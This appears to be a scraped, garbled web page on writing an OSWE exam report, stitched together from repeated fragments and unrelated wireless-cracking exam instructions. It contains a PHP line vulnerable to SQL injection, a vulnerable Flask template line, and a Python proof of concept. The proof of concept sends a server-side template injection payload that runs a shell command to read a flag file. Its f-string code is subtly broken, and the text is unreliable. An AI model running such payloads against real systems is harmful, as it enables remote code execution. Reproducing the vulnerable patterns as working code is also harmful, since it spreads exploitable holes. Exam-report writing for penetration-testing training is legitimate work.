Compromised both app1 and app2 via source code review. Achieved remote code execution and extracted all flags.
For each target, provide the method and code used to identify and exploit the vulnerability. Step-by-Step Walkthrough: oswe exam report
$id = $_GET['id']; $query = "SELECT * FROM users WHERE id = " . $id; Compromised both app1 and app2 via source code review
Every successful "crack" must be documented with screenshots. These screenshots must clearly show the recovered wireless key and the "proof" file or flag requested by the exam instructions. : Upload the archive to the OffSec Exam Control Panel
: Upload the archive to the OffSec Exam Control Panel . Essential Report Sections
name = request.args.get('name') return render_template_string(f"<h1>Hello name</h1>") </code></pre> <p><strong>PoC</strong>:</p> <pre><code class="language-python">import requests payload = "''.__class__.__mro__[2].__subclasses__()[407]('cat /flag.txt', shell=True, stdout=-1).communicate()" requests.get(f"http://target/profile?name=payload") </code></pre> <p><strong>Exploit script</strong>: <code>exploit_ssti.py</code> (attached) <strong>Screenshot</strong>: Fig1 – command output showing flag</p> <p>[Repeat for second vulnerability chain on other target]</p> <h2>Flags</h2> <ul> <li><code>proof.txt</code> on app1: <code>e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</code></li> <li>Screenshot of shell with <code>id</code> and <code>cat proof.txt</code></li> </ul> <h2>Remediation</h2> <p>Use <code>render_template()</code> with user-controlled variables passed as context, never string concatenation with <code>render_template_string()</code>.</p> <pre><code> ---